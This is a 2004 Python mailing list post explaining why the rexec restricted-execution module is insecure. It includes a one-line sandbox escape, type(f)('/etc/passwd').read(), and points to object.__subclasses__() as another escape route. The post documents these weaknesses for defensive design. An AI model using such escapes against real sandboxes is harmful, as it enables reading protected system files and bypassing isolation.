Creating a capabilities-based restricted execution system
Martin v. Loewis
martin at v.loewis.de
Sat Jan 3 07:09:48 EST 2004
Sean R. Lynch wrote:
> If you know of a location where the known shortcomings of rexec are
> documented, please let me know. So far I've only seen a couple examples
> and a lot of people saying "it's not secure so let's disable it."
The biggest problem is that new-style classes are both available through
the type() builtin, and callable to create new instances.
For example, if you have managed to open a file object f, then
type(f)("/etc/passwd").read()
lets you access a different file, bypassing all machinery that may
have been designed to prevent that from happening.
Of course, for the specific case of file objects, there is additional
machinery preventing that from happening, but in the general case,
there might be more problems in that area. For example,
object.__subclasses__() gives you access to quite a lot of stuff.
Regards,
Martin
More information about the Python-list
mailing list